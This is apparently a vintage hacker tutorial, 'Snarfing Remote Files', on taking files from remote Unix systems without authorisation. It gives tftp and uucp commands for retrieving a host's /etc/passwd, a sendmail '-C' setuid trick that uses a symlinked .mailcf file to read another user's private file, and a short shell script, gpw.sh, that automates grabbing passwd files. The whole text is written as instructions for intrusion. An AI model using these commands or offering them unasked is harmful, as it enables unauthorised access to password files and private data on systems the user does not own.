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Snarfing Remote File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by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Dark OverLor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getting copies of files from a remot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permission to read or an account on login on to and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ny administrators do not even bother to restrict m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imples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se uucp(1) [Trivial File Transfer Protocol] to retrie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f you are running on an Internet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use uucp(1) [Unix to Unix Copy Program] to retrieve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ucp connections are running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ess one of many known security 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we will use the passwd file as the fil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adable file that can be found on most system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val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tart the tft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have the following promp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xt step is to connect to the system that you wish to re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At the tft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connect other.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request the file you wish to get a copy of (in ou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file /etc/passw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get /etc/passwd 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should see something that looks like the follow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185659 bytes in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it the tftp program with the "qui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copy of other.system.com's passwd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nix systems' tftp programs have a different syntax.  The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under Sun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pollo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p -{g|g!|p|r|w} &lt;local file&gt; &lt;host&gt; &lt;foreign file&gt; [netascii|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 -g password_file networked-hos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"man" pages for more info (or in other words RT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, I will include a shell script that will snar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from a remote host. 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w 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are getting the file  /etc/passwd  from the system uusu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a direct uucp connection to that syst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of the file through the uucp links. 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 copy of the passwd file be copied into uuc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-m uusucker!/etc/passwd '&gt;uucp/uusucker_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m" means you will be notified by mail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ossible way to access the desired file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ermiss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ill utilize a well-known bug in Unix's sendmai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has and option "-C" in which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use (by default this file is /usr/lib/sendmail.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cf).  It should also be noted that the diagnostics outpu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ntain the offending lines of text.  Also note that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setui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can abuse this set of facts (if you have not yet guessed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you wish read as the configuration file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-C/usr/accounts/random_joe/privat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opy of random joe'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trick is to symlink your .mailcf file to joe's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When mail executes sendmail (to send the mail), it will lo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f and barf out joe'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ink joe's file to your .mailc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-s /usr/accounts/random_joe/private/file $HOME/.mai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mai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 gpw.sh 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pw copyright(c) Dark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tftp $1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/etc/passwd /tmp/pw.$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Cut Here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